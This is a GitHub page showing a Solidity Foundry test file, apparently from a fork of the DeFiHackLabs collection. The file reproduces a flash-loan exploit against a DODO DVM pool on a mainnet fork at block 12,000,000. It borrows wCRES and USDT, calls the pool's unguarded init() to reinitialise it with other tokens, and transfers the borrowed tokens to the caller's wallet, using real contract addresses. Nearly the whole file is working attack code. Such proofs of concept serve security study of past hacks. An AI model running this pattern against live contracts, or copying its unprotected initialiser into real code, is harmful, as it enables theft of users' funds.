forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdodo_flashloan_exp.sol
49 lines (39 loc) · 2.12 KB
/
dodo_flashloan_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./interface.sol";
contract ContractTest is DSTest {
uint256 wCRES_amount = 130_000_000_000_000_000_000_000;
uint256 usdt_amount = 1_100_000_000_000;
IERC20 wCRES_token = IERC20(0xa0afAA285Ce85974c3C881256cB7F225e3A1178a);
USDT usdt_token = USDT(0xdAC17F958D2ee523a2206206994597C13D831ec7);
address maintainer = 0x95C4F5b83aA70810D4f142d58e5F7242Bd891CB0;
DVM dvm = DVM(0x051EBD717311350f1684f89335bed4ABd083a2b6);
address mtFeeRateModel = 0x5e84190a270333aCe5B9202a3F4ceBf11b81bB01;
uint256 lpFeeRate = 3_000_000_000_000_000;
address mywallet = msg.sender;
uint256 i = 1;
uint256 k = 1_000_000_000_000_000_000;
bool isOpenTWAP = false;
address token1 = 0x7f4E7fB900E0EC043718d05caEe549805CaB22C8;
address token2 = 0xf2dF8794f8F99f1Ba4D8aDc468EbfF2e47Cd7010;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 12_000_000); // fork mainnet block number 12000000
}
function testExploit() public {
address me = address(this);
dvm.flashLoan(wCRES_amount, usdt_amount, me, "whatever");
//emit log_named_uint("Exploit completed, WBNB Balance",wbnb.balanceOf(mywallet));
}
function DVMFlashLoanCall(address a, uint256 b, uint256 c, bytes memory d) public {
emit log_named_uint("FlashLoan WBNB Balance", wCRES_token.balanceOf(address(this)));
dvm.init(maintainer, token1, token2, lpFeeRate, mtFeeRateModel, i, k, isOpenTWAP);
wCRES_token.transfer(mywallet, wCRES_token.balanceOf(address(this)));
usdt_token.transfer(mywallet, usdt_token.balanceOf(address(this)));
emit log_named_uint("After Exploit completed, wCRES Balance", wCRES_token.balanceOf(mywallet));
usdt_token.transfer(mywallet, usdt_token.balanceOf(address(this)));
emit log_named_uint("After Exploit completed, USDT Balance", usdt_token.balanceOf(mywallet));
}
}